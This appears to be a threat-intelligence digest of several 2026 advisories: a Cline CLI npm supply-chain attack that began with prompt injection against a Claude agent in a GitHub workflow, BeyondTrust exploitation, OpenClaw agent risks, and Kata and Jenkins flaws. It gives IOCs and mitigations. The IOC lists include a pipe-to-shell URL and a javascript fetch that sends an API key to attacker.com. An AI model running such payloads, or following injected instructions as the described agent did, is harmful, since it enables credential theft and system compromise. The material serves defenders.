Cline CLI 2.3.0 Supply Chain Attack Installed OpenClaw on Developer Systems
On February 17, 2026, the open-source, AI-powered coding assistant Cline CLI experienced a supply chain attack where version 2.3.0 was published to the NPM registry via a compromised npm publish token, stealthily installing the OpenClaw autonomous AI agent on developer systems. The malicious package, downloaded approximately 4,000 times during an eight-hour window, included a `postinstall` script to install `openclaw@latest`. Although OpenClaw itself was not deemed malicious, its unauthorized installation was unintended. Cline maintainers subsequently released version 2.4.0, deprecated 2.3.0, revoked the compromised token, and implemented OpenID Connect (OIDC) for npm publishing via GitHub Actions. Users are advised to update Cline CLI and remove any unintended OpenClaw installations. This compromise is attributed to "Clinejection," a vulnerability discovered by Adnan Khan, which exploits a misconfigured GitHub workflow where an AI agent (Claude) with excessive permissions could be tricked via prompt injection in a GitHub issue title to execute arbitrary code. This attack leveraged GitHub Actions cache poisoning to steal publication secrets, including the npm publish token, demonstrating a novel CI/CD attack surface involving AI agents and underscoring the necessity for robust governance of privileged AI actors.
Severity: Critical
Threat Details and IOCs
| Victim Industries: | Information Technology |
Mitigation Advice
- Scan all developer workstations and CI/CD environments to identify any installations of the `cline` npm package, specifically version `2.3.0`.
- On any system where `cline@2.3.0` is found, immediately update the package to version `2.4.0` or later.
- Scan all developer workstations and CI/CD environments for installations of the `openclaw` npm package and uninstall it immediately if its presence is not explicitly authorized by the security team.
Compliance Best Practices
- For all internally developed software, migrate CI/CD publishing pipelines from using static, long-lived API tokens to short-lived, tokenless authentication mechanisms like OpenID Connect (OIDC).
- After migrating to a trusted publishing mechanism like OIDC, configure your package registries to explicitly disable authentication via traditional, static API tokens for your organization's software packages.
- Establish a formal security policy for the use of AI agents in CI/CD pipelines, and conduct regular audits to ensure these agents operate under the principle of least privilege.
- Review and re-architect CI/CD pipelines to enforce strict separation between workflows, ensuring that low-trust jobs (like issue triaging) cannot write to or influence caches consumed by high-trust jobs (like release publishing).
- Implement a Software Composition Analysis (SCA) tool to automatically scan third-party dependencies for risky characteristics, such as the presence of `postinstall` scripts, before they are approved for developer use.
VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731)
A critical pre-authentication remote code execution vulnerability, CVE-2026-1731 (CVSS v4 9.9), has been identified in BeyondTrust Remote Support’s thin-scc-wrapper WebSocket handler, enabling OS command injection. Active exploitation has been observed, leading to the deployment of web shells and backdoors, including SparkRAT and VShell, account creation, lateral movement, and data exfiltration. This activity has impacted organizations across financial services, legal, high tech, higher education, wholesale/retail, and healthcare sectors in the U.S., France, Germany, Australia, and Canada. The vulnerability was added to CISA's Known Exploited Vulnerabilities Catalog on February 13, 2026, with over 10,600 exposed instances identified. Attackers exploit this public-facing application (MITRE T1190) by injecting a crafted remoteVersion payload during the WebSocket handshake. Indicators of Compromise include C2 IP addresses such as 23.162.40[.]187 and 138.197.14[.]95/ws, malicious domains like q0r2e5q2dzbykcox9qmkptm12s8mwb.oastify[.]com, file hashes for SparkRAT (9f431d5549a03aee92cfd2bdbbe90f1c91e965c99e90a0c9ad5a001f4e80c350) and VShell (98a7b0900a9072bb40af579ec372da7b27af12b15868394df51fefe290ab176b), and filenames such as aws.php and blue.drx. Recommended mitigations include applying vendor patches for specified BeyondTrust Remote Support and Privileged Remote Access versions, and limiting administrative interfaces through segmentation or zero-trust principles.
Severity: Critical
Threat Details and IOCs
| Malware: | AntSword, BADIIS, China Chopper, Chrysalis, DragonForce, Evilmouse, HackTool:Win32/Impacket, Impacket, Meterpreter, Netdragon, SimpleHelp, SparkRAT, VShell |
| CVEs: | CVE-2024-12356, CVE-2024-12686, CVE-2024-43468, CVE-2025-1094, CVE-2025-15556, CVE-2025-26399, CVE-2025-40536, CVE-2025-40551, CVE-2026-1281, CVE-2026-1731, CVE-2026-20700 |
| Technologies: | Apache HTTP Server, Apple iOS, Apple macOS, BeyondTrust Privileged Access Management, BeyondTrust Remote Support, GNU Bash, Linux, Microsoft Active Directory, Microsoft Configuration Manager, Microsoft Windows, Microsoft Windows Server, Notepad++, PHP, SolarWinds Web Help Desk |
| Threat Actors: | Billbug, BronzeElgin, DragonSpark, FlaxTyphoon, G0030, Hafnium, LotusBlossom, LotusPanda, RaspberryTyphoon, RedDev13, SaltTyphoon, SilkTyphoon, SpringDragon, Thrip, VoltTyphoon |
| Attacker Countries: | China, Iran, Russia |
| Attacker IPs: | 124.222.137.114, 134.122.13.34, 138.197.14.95, 142.111.152.50, 144.172.103.200, 155.2.215.64, 178.128.212.209, 179.43.146.42, 23.162.40.187, 37.19.221.180, 45.61.150.96, 45.77.31.210, 59.110.7.32, 64.31.28.221, 64.95.10.115, 70.23.0.66, 82.29.53.187, 82.29.72.16, 83.138.53.139, 85.155.186.121, 92.223.44.134, 98.10.233.76 |
| Attacker Emails: | hello@hacktron.ai |
| Attacker Domains: | 39uchxifap4cvgzsuirom0szrrg.d65lre9sfqnlcv49317gcis6pyjsatzho.oast.pro, 45.77.31.210.vultrusercontent.com, aliyundunupdate.xyz, api.skycloudcenter.com, api.wiresguard.com, cdncheck.it.com, d65sb7ngveucv5k2nm508abdsjmbn7qmn.oast.pro, github.com, hacktron.ai, judiemkqjajsfzpidfjlowgl8nyrtd49x.oast.fun, oast.fun, oastify.com, q0r2e5q2dzbykcox9qmkptm12s8mwb.oastify.com, raw.githubusercontent.com, skycloudcenter.com, temp.sh, transfer.weepee.io, wiresguard.com |
| Attacker URLs: | 138.197.14.95/ws, aliyundunupdate.xyz:8084/slt, /get_portal_info, http://124.222.137.114:9999/3yZR31VK, http://124.222.137.114:9999/api/Info/submit, http://124.222.137.114:9999/api/updateStatus/v1, http://59.110.7.32:8880/api/getBasicInfo/v1, http://59.110.7.32:8880/api/Metadata/submit, http://59.110.7.32:8880/uffhxpSy, https://45.77.31.210/api/FileUpload/submit, https://45.77.31.210/api/update/v1, https://45.77.31.210/users/admin, hxxp://134.122.13.34:8979/c, hxxp://39uchxifap4cvgzsuirom0szrrg.d65lre9sfqnlcv49317gcis6pyjsatzho.oast.pro, hxxp://64.31.28.221/support, hxxp://82.29.53.187:8778/app_cli, hxxp://85.155.186.121/access, hxxps://64.95.10.115:23011/update.sh, hxxps://85.155.186.121/access/Remote%20Access-linux64-offline.tar?language=en&app=76049110434275449312180081368257747094, hxxps://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_linux_amd64.tar.gz, hxxps://judiemkqjajsfzpidfjlowgl8nyrtd49x.oast.fun, hxxps://raw.githubusercontent.com/nezhahq/scripts/main/agent/install.ps1, hxxps://temp.sh/tQTSs/storm.exe, hxxps://transfer.weepee.io/7nZw7/blue.drx |
| Attacker Hashes: | 0ecc867ce916d01640d76ec03de24d1d23585eb582e9c48a0364c62a590548ac, 11be5164dc1122fb5a7daa3eef9467e43d8458425b15a640235796006590c977, 2da00de67720f5f13b17e9d985fe70f10f153da60c9ab1086fe58f069a156924, 3bdc4c0637591533f1d4198a72a33426c01f69bd2e15ceee547866f65e26b7ad, 4762e944a0ce1f9aef243e11538f84f16b6f36560ed6e32dfd9a5f99e17e8e50, 66cceb2c2f1d9988b501832fd3b559775982e2fce4ab38fc4ffe71b74eafc726, 679ee05d92a858b6fe70aeb6072eb804548f1732e18b6c181af122b833386afb, 8ea8b83645fba6e23d48075a3f3fd23eba515b4536710cda4f1f232718f53ea5, 9276594e73cda1c69b7d265b3f08dc8fa84bf2d6599086b9acc0bb3745146600, 98442387d466f27357d727b3706037a4df12a78602b93df973b063462a677761, 98a7b0900a9072bb40af579ec372da7b27af12b15868394df51fefe290ab176b, 9f431d5549a03aee92cfd2bdbbe90f1c91e965c99e90a0c9ad5a001f4e80c350, bfea78def679aa1117f569a35e8fd154, cc2bc3750cc5125a50466f66ae4f2bedf1cac0e43477a78ed2fd88f3e987a292, cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce, f4d829739f2d6ba7e3ede83dad428a0ced1a703ec582fc73a4eee3df3704629a |
| Victim Industries: | Aerospace, Agriculture, Automotive, Chemical, Commercial Facilities, Communication Services, Critical Manufacturing, Dams, Defense, Defense Industrial Base, Education, Emergency Services, Energy, Financial Services, Government, Healthcare, Hospitality, Information Technology, Law Enforcement, Legal Services, Manufacturing, Media and Entertainment, Multimedia, Nuclear Reactors, Materials, and Waste, Public Health, Retail, Technology Hardware, Telecommunications, Transportation, Utilities, Water & Wastewater, Wholesale |
| Victim Countries: | Australia, Canada, France, Germany, Hong Kong, Indonesia, Philippines, Taiwan, United States, Vietnam |
Mitigation Advice
- Immediately apply the vendor-supplied patches for all vulnerable BeyondTrust Remote Support and Privileged Remote Access instances to remediate CVE-2026-1731.
- Add the attacker IP addresses listed in the article's Indicators of Compromise, including 23.162.40.187 and 138.197.14.95, to the blocklist on network firewalls and web proxies.
- Block the malicious domains and URLs listed in the article's Indicators of Compromise within your DNS filtering service and web proxy.
- Add the file hashes for SparkRAT, VShell, and other malware artifacts provided in the article to your Endpoint Detection and Response (EDR) or antivirus solution's blocklist.
- Scan all public-facing web servers for the presence of files named 'aws.php', 'file_save.php', and 'blue.drx' to identify potential webshells.
- Audit authentication logs on BeyondTrust servers and connected systems for any unauthorized or suspicious user accounts created since the vulnerability was disclosed.
- Run the provided XQL detection queries in your SIEM or XDR to hunt for signs of post-exploitation activity on Windows and Linux systems related to this threat.
Compliance Best Practices
- Develop and implement a network segmentation strategy to isolate public-facing administrative tools like BeyondTrust from the internal corporate network.
- Initiate a project to implement Zero Trust principles for all administrative applications, ensuring every access request is strictly authenticated and authorized based on user and device context.
- Establish a continuous External Attack Surface Management (EASM) program to discover, inventory, and assess the security of all internet-facing assets.
- Configure network firewalls to enforce a default-deny policy for all outbound traffic from server segments, allowing only explicitly approved protocols and destinations required for business functions.
- Deploy a Web Application Firewall (WAF) in front of all public-facing applications to protect against command injection, cross-site scripting, and other web application attacks.
https://arcticwolf.com/resources/blog/cve-2026-1731/
https://cyberpress.org/beyondtrust-0-day-vulnerability/
https://cyberpress.org/beyondtrust-flaw/
https://cyberpress.org/patch-immediately-beyondtrust/
https://cyberveille.esante.gouv.fr/alertes/beyondtrust-cve-2026-1731-2026-02-09
https://gbhackers.com/attackers-exploit-critical-beyondtrust-flaw/
https://gbhackers.com/beyondtrust-rce-vulnerability-under-active-exploitation/
https://gbhackers.com/beyondtrust-remote-access-0-day-rce/
https://gbhackers.com/beyondtrust-vulnerability/
https://horizon3.ai/attack-research/vulnerabilities/cve-2026-1731/
https://orca.security/resources/blog/cve-2026-1731-beyondtrust-vulnerability/
https://socradar.io/blog/cve-2026-1731-rce-beyondtrust-rs-pra/
https://sploitus.com/exploit?id=03974D49-2414-56D4-AE7F-D90CD6138171
https://sploitus.com/exploit?id=51382817-068E-51A1-A291-B0F91FEAB101
https://sploitus.com/exploit?id=PACKETSTORM:215712
https://thehackernews.com/2026/02/beyondtrust-fixes-critical-pre-auth-rce.html
https://thehackernews.com/2026/02/researchers-observe-in-wild.html
https://www.cyberkendra.com/2026/02/ai-discovers-critical-zero-click-flaw.html
https://www.esecurityplanet.com/threats/beyondtrust-rce-exploited-for-domain-control/
https://www.helpnetsecurity.com/2026/02/09/beyondtrust-remote-access-vulnerability-cve-2026-1731/
https://www.helpnetsecurity.com/2026/02/13/beyondtrust-cve-2026-1731-poc-exploit-activity/
https://www.hendryadrian.com/beyondtrust-warns-of-critical-rce-flaw-in-remote-support-software/
Kata Containers Cloud Hypervisor Guest VM Root RCE (CVE-2026-24834)
CVE-2026-24834 represents a critical privilege escalation vulnerability (CVSS 9.3) affecting Kata Containers versions prior to 3.27.0 when configured with Cloud Hypervisor as the Virtual Machine Monitor (VMM). This flaw allows a user already within a Kata container to achieve arbitrary code execution as root inside the guest micro VM. The vulnerability stems from a breakdown in isolation, enabling direct manipulation of the underlying guest micro VM's filesystem from within the container environment. Attackers can exploit this by injecting malicious code, modifying critical system files, or replacing binaries, thereby gaining full root access within the guest VM. While the host system and other VMs remain unaffected, a specific edge case for arm64 QEMU setups lacking NVDIMM read-only support could theoretically allow guest writes to the image file itself. Exploitation requires an attacker to have access to a running container instance utilizing Cloud Hypervisor. Remediation involves updating Kata Containers to version 3.27.0 or any subsequent release to address the core issue of guest filesystem manipulation.
Severity: High
Threat Details and IOCs
| CVEs: | CVE-2026-24834 |
| Technologies: | Cloud Hypervisor, Kata Containers, Linux |
| Victim Industries: | Cloud Infrastructure |
Mitigation Advice
- Inventory all systems to identify which are running Kata Containers with Cloud Hypervisor as the Virtual Machine Monitor (VMM).
- Update all identified vulnerable Kata Containers deployments (versions prior to 3.27.0) to version 3.27.0 or newer.
- Implement file integrity monitoring (FIM) rules to detect and alert on any modifications to critical system files (e.g., /bin/sh, /etc/ld.so.preload, systemd unit files) within Kata guest micro VMs.
Compliance Best Practices
- Review and harden security configurations for all container images and runtime environments to minimize the risk of initial access, enforcing the principle of least privilege for all containerized processes.
- Establish and maintain a comprehensive Software Bill of Materials (SBOM) for all containerized environments to enable rapid identification of vulnerable components and their specific configurations.
- Evaluate and deploy a container runtime security solution to provide advanced threat detection for anomalous activities, including container escape attempts and unauthorized filesystem access.
- Review and formalize the patch management policy to include aggressive SLAs for critical vulnerabilities affecting containerization and virtualization infrastructure.
Running OpenClaw Safely: Identity, Isolation, and Runtime Risk
Self-hosted agent runtimes, such as OpenClaw, introduce significant security risks by processing untrusted input and executing external code (skills) with persistent credentials, effectively shifting the security boundary and leading to potential credential exfiltration, agent state manipulation, and host compromise. To mitigate these, a minimum safe operating posture mandates deploying agents in isolated environments with dedicated, non-privileged credentials and non-sensitive data, alongside continuous monitoring for state changes, regular rebuilds, and robust backup strategies. Key attack vectors include indirect prompt injection via malicious content and "poisoned skills" from public registries, which can lead to unauthorized state access, privilege reuse, and persistent configuration changes. Effective defense requires comprehensive controls across identity, endpoint, supply chain, network, and data protection, supported by continuous monitoring and specific hunting queries to detect anomalous agent activities like unexpected skill installs, listening services, or shell spawning.
Severity: Critical
Threat Details and IOCs
| Malware: | AMOS, Atomic macOS Stealer, Atomic Stealer, BadIIS, Broomstick, ClawdBot Agent, CleanUp, CleanUpLoader, ConnectWise Control, ConnectWise ScreenConnect, GhostChat, GORBLE, Lumma, LummaC2, Lumma Stealer, OSX.AtomicStealer, OSX.AtomStealer, OysterLoader, POWERSTAR, Redline, Redline Loader, RedLine Stealer, Rhysida, RisePro, ScreenConnect, ScreenConnect RAT, Speldings.exe, StealC, TAMECAT, Trojan/OpenClaw.PolySkill, Vidar, Vidar Stealer |
| CVEs: | CVE-2024-28863, CVE-2025-49596, CVE-2025-52882, CVE-2025-59466, CVE-2025-64756, CVE-2025-6514, CVE-2026-21636, CVE-2026-22708, CVE-2026-24763, CVE-2026-25157, CVE-2026-25253, CVE-2026-2577, CVE-2026-26319, CVE-2026-26322, CVE-2026-26329 |
| Technologies: | Alibaba Cloud, Amazon Web Services, Anthropic Claude, Apache HTTP Server, Apple iOS, Apple macOS, Caddy, Cloudflare Tunnel, ConnectWise ScreenConnect, DigitalOcean, Docker, Express.js, F5 NGINX, Git, GitHub, Google Cloud Platform, Google Gemini, Hetzner, Joomla!, Kubernetes, Linux, LLaVA, Microsoft Azure, Microsoft Entra, Microsoft Visual Studio, Microsoft Windows, Moltbook, NGINX, Node.js, npm, OpenAI, OpenClaw, OVHcloud, Python, Signal, Slack, SSH, Supabase, Tassos Framework, Telegram, Tencent Cloud, Vercel Next.js, WhatsApp |
| Threat Actors: | AngryLikho, APT28, ClawHavoc, CookieSpider, FancyBear, hightower6eu, Kimsuky, Moonshine100rze, Rhysida |
| Attacker Countries: | Russia |
| Attacker IPs: | 178.16.54.253, 179.43.176.32, 202.161.50.59, 54.91.154.110, 91.92.242.30, 95.92.242.30, 96.92.242.30 |
| Attacker Domains: | attacker.com, auth.clawdhub.com, auth.clawhub.com, clawbot.ai, clawd.bot, clawdbot.getintwopc.site, clawdbot.you, clawhub.ai, clawhub.openclaw.ai, darkgptprivate.com, docs.clawd.bot, docs.molt.bot, docs.openclaw.ai, getintwopc.site, github.com/hedefbari, glot.io, install.app-distribution.net, meeting.bulletmailer.net, moltbook.ai, molt.bot, moltbotai.chat, moltbot.you, moltyverse.email, ngrok.io, openclaw.ai, pipedream.net, rentry.co, roarin.ai, socifiapp.com, webhook.site, www.dropbox.com |
| Attacker URLs: | github.com/gstarwd/clawbot, http://54.91.154.110:13338/, http://54.91.154.110:13338/|sh, http://91.92.242.30/6x8c0trkp4l9uugo, http://91.92.242.30/7buu24ly8m1tn8m4, http://91.92.242.30/x5ki60w1ih838sp7, http://clawdbot.getintwopc.site/config.json, http://clawdbot.getintwopc.site/dl/Lightshot.dll, http://clawdbot.getintwopc.site/dl/Lightshot.exe, https://api.moltyverse.email, https://attacker.com, https://darkgptprivate.com/d111, https://github.com/denboss99, https://github.com/hedefbari/openclaw-agent/releases/download/latest/openclaw-agent.zip, https://glot.io/snippets/hfdxv8uyaf, https://install.app-distribution.net/setup/, https://moltyverse.email/start.md, https://openclaw.ai/install.ps1, https://roarin.ai/api/trpc/botNetwork.me, https://roarin.ai/api/trpc/botNetwork.register, https://socifiapp.com, https://swcdn.apple.com/content/downloads/update/software/upd/, https://webhook.site/358866c4-81c6-4c30-9c8c-358db4d04412, https://www.dropbox.com/scl/fi/tmwi4j86op04r9qo2xdgh/zoomupdate.msi?rlkey=ymr9yn5p3q2w2l3uz9cg71dvm&st=q93av9p6&dl=1, hxxp://54.91.154.110:13338/%7Csh, hxxps://socifiapp.com/api/reports/upload, hxxps://webhook.site/358866c4-81c6-4c30-9c8c-358db4d04412, javascript:fetch('https://attacker.com?k='+localStorage.getItem('moltbook_api_key')), ?option=com_ajax, ?option=com_ajax&format=raw&plugin=nrframework, ws://localhost:18789 |
| Attacker Hashes: | 04ef48b104d6ebd05ad70f6685ade26c1905495456f52dfe0fb42f550bd43388, 087361307be2b2789849d4fd58170cca, 0c76e33ddde228e9ce098edf3bf5f06a, 0e52566ccff4830e30ef45d2ad804eefba4ffe42062919398bf1334aab74dd65, 17703b3d5e8e1fe69d6a6c78a240d8c84b32465fe62bed5610fb29335fe42283, 1e6d4b0538558429422b71d1f4d724c8ce31be92d299df33a8339e32316e2298, 2444b3ab5de42fcca22e6025cf018e3b, 37102fddfbca1e750b61943162b15004, 3a4450bacf20eea2dcc246da7bce9667, 5e4428176aeb8cfc7f0391654d683a2a, 63e9707b978b7569f26636e9a9bb3b14, 75661cbf8fd50009be0c46a9ca8b3180, 760c89959e2d80f9b78a320023a875b7c458840f920770438cda517160bfd1b1, 79e8f3f7a6113773cdbced2c7329e6dbb2d0b8b3bf5a18c6c97cb096652bc1f2, 8611dfd731c27ac1592de60a31c66634, a3365c837ec2659c2aa04e7010a0db15, a37f6403fbf28fa0b48863287f4c5a5db8f295977d4dec2e9bffd6fce2320bd1, a535666293db8dcaba511e38b735f2b86eb06663f1f6a43ab59bf0d35ae4e933, adbcdb613c04fd51936cb0863d2417604db0cd04792ab7cae02526d48944c77b, be24b44d4895c6bc14e3f98a9687a399, d1e0c26774cb8beabaf64f119652719f673fb530368d5b2166178191ad5fcbea, db48607a6f85e716a3ec3e9b613f278d683c79817d7a3c32619a6623f85a5b32, e20b920c7af988aa215c95bbaa365d005dd673544ab7e3577b60fecf11dcdea2, f58854f6450618729679ad33622bebaf |
| Victim Industries: | Agriculture, Artificial Intelligence, Cloud Infrastructure, Creator Economy, Critical Manufacturing, Cryptocurrency, E-commerce, Education, Energy, Financials, Financial Services, Government, Healthcare, Health Care Technology, Hospitality, Information Services, Information Technology, Insurance, Legal Services, Manufacturing, Marketing & Advertising, Media and Entertainment, Multimedia, Non-Governmental Organizations (NGOs), Real Estate, Retail, Social Media, Software, Sports and Entertainment, Technology Hardware, Telecommunications, Transportation |
| Victim Countries: | Australia, Austria, Belgium, Brazil, Bulgaria, Canada, China, Colombia, Croatia, Cyprus, Czech Republic, Denmark, Estonia, Finland, France, Germany, Greece, Hong Kong, Hungary, India, Ireland, Italy, Japan, Latvia, Lithuania, Luxembourg, Malta, Mexico, Netherlands, Norway, Poland, Portugal, Romania, Russia, Singapore, Slovakia, Slovenia, South Korea, Spain, Sweden, Switzerland, United Kingdom, United States |
Mitigation Advice
- Using Microsoft Defender XDR, run a hunt query against `DeviceProcessEvents` to search for process command lines or filenames containing 'openclaw', 'moltbot', or 'clawdbot' on endpoints.
- Using Microsoft Defender XDR, run a hunt query against `CloudProcessEvents` to search for process command lines or filenames containing 'openclaw', 'moltbot', or 'clawdbot' in cloud workloads.
- Using Microsoft Defender XDR, run a hunt query against `DeviceProcessEvents` to find command lines containing 'clawhub install' to identify which skills are being installed and by whom.
- Using Microsoft Defender XDR, run a hunt query to detect processes like 'openclaw' spawning shells ('cmd.exe', 'powershell.exe', 'bash') or download tools ('curl', 'wget').
- Using Microsoft Defender XDR, run a hunt query against `DeviceNetworkEvents` to find any listening connections created by processes associated with 'openclaw', 'moltbot', or 'clawdbot'.
- If an unauthorized OpenClaw runtime is discovered on a device, use Microsoft Defender for Endpoint to isolate the device from the network while investigation occurs.
Compliance Best Practices
- Develop and enforce a security policy that requires any evaluation or use of self-hosted agent runtimes like OpenClaw to occur only on dedicated, isolated virtual machines or separate physical systems.
- Establish a process to issue dedicated, least-privilege service accounts with short-lived tokens for any approved AI agent runtime.
- In Microsoft Entra ID, configure and enforce admin consent workflows to prevent users from granting permissions to new or risky OAuth applications, especially those with high-privilege scopes.
- Deploy Microsoft Purview Endpoint Data Loss Prevention (DLP) policies to audit and block agent processes from accessing or exfiltrating data marked with sensitive labels.
- Use an application control solution, such as Microsoft Defender Application Control, to create policies that restrict agent runtimes from installing skills or extensions from unapproved publishers or repositories.
- For any approved agent host, configure host-based or network firewalls to enforce strict egress filtering, allowing outbound connections only to a pre-approved list of destinations.
- Develop a specific incident response playbook for compromised AI agents, detailing steps for isolation, credential rotation, state/memory forensics, and restoration from a known-good backup.
https://cyberinsider.com/infostealer-malware-now-targeting-openclaw-ai-environments/
https://cyberpress.org/1-click-clawdbot-vulnerability/
https://cyberpress.org/clawhavoc-poisons-openclaws-clawhub-with-1184-malicious-skills/
https://cyberpress.org/hackers-exploit-openclaw-configurations/
https://cyberpress.org/joomla-novarain-tassos-framework-flaws/
https://cyberpress.org/log-poisoning-vulnerability/
https://cyberpress.org/moltbot-operators-leak-control-panels-via-exposed-mdns-traffic/
https://depthfirst.com/post/1-click-rce-to-steal-your-moltbot-data-and-keys
https://gbhackers.com/15200-openclaw-control-panels-exposed/
https://gbhackers.com/1-click-flaw-in-clawdbot/
https://gbhackers.com/abuse-of-openclaw-ai-capabilities-enables-stealthy-malware/
https://gbhackers.com/openclaw-2026-2-12-released/
https://gbhackers.com/openclaw-configurations/
https://hackread.com/infostealer-steal-openclaw-ai-identity-memory-files/
https://securityboulevard.com/2026/02/42900-openclaw-exposed-control-panels-and-why-you-should-care/
https://securityboulevard.com/2026/02/the-agentic-virus-how-ai-agents-become-self-spreading-malware/
https://socradar.io/blog/cve-2026-25253-rce-openclaw-auth-token/
https://sploitus.com/exploit?id=200AAF0D-8E2F-5BF9-9AA0-40C1A1A23652
https://thehackernews.com/2026/01/fake-moltbot-ai-coding-assistant-on-vs.html
https://thehackernews.com/2026/02/openclaw-integrates-virustotal-scanning.html
https://the-sequence.com/openclaw-security-risks-autonomous-ai-agents
https://www.cyberkendra.com/2026/01/openclaw-hacked-by-ai.html
https://www.esecurityplanet.com/threats/fake-clawdbot-vs-code-extension-deploys-screenconnect-rat/
https://www.esecurityplanet.com/threats/openclaw-flaw-enables-ai-log-poisoning-risk/
https://www.kaspersky.com/blog/moltbot-enterprise-risk-management/55317/
https://www.securityjoes.com/post/hunting-openclaw-detection-and-containment-guidance-for-defenders
https://www.techzine.eu/news/security/138633/over-40000-openclaw-agents-vulnerable/
https://www.techzine.eu/news/security/138835/infostealer-steals-identity-of-ai-agent-openclaw/
https://www.thehackerwire.com/openclaw-client-side-websocket-token-leak-cve-2026-25253/
https://www.thehackerwire.com/openclaw-docker-sandbox-command-injection-cve-2026-24763/
https://www.theregister.com/2026/02/09/openclaw_instances_exposed_vibe_code/
CI/CD at Risk: High-Severity Jenkins XSS Flaw Exposes Build Environments
Jenkins maintainers have issued critical security updates to address two vulnerabilities within its core architecture: a high-severity stored Cross-Site Scripting (XSS) flaw (CVE-2026-27099) and a medium-severity information disclosure issue (CVE-2026-27100). The XSS vulnerability, affecting Jenkins 2.550 and earlier, and LTS 2.541.1 and earlier, stems from improper sanitization of user-provided descriptions for offline nodes, allowing attackers with Agent/Configure or Agent/Disconnect permissions to inject malicious scripts that execute in the browsers of users viewing the node's status. The information disclosure flaw, present in the same versions, enables attackers with Item/Build and Item/Configure permissions to leverage the "Run Parameter" feature to determine the existence and display names of jobs and builds they are not authorized to access, providing a reconnaissance vector. To mitigate these risks, administrators should update to Jenkins weekly version 2.551 or LTS version 2.541.2.
Severity: Critical
Threat Details and IOCs
| Malware: | Defray, Defray777, RansomEXX, Ransom X |
| CVEs: | CVE-2026-27099, CVE-2026-27100 |
| Technologies: | Jenkins |
| Victim Industries: | Financial Services, Healthcare, Information Technology, Manufacturing, Retail, Software |
Mitigation Advice
- Update all Jenkins weekly instances from vulnerable versions (up to 2.550) to the patched version 2.551 or later.
- Update all Jenkins Long-Term Support (LTS) instances from vulnerable versions (up to 2.541.1) to the patched version 2.541.2 or later.
- Audit and temporarily restrict 'Agent/Configure' and 'Agent/Disconnect' permissions in Jenkins to only essential, trusted administrative accounts.
- Conduct an immediate review of all accounts with 'Item/Build' and 'Item/Configure' permissions in Jenkins and remove any that are non-essential.
Compliance Best Practices
- Establish a formal, quarterly access control review process for all Jenkins user roles and permissions to ensure accounts only have the minimum access required for their function.
- Deploy and configure a Web Application Firewall (WAF) in front of the Jenkins instance to provide a protective layer against XSS and other common web application attacks.
- Implement a comprehensive patch management policy and automated process for all tools within the CI/CD pipeline to ensure security updates are identified and applied within a defined timeframe.
- Develop and mandate annual security training for all developers and DevOps engineers, with a specific module on securing the CI/CD pipeline and recognizing potential insider threat indicators.
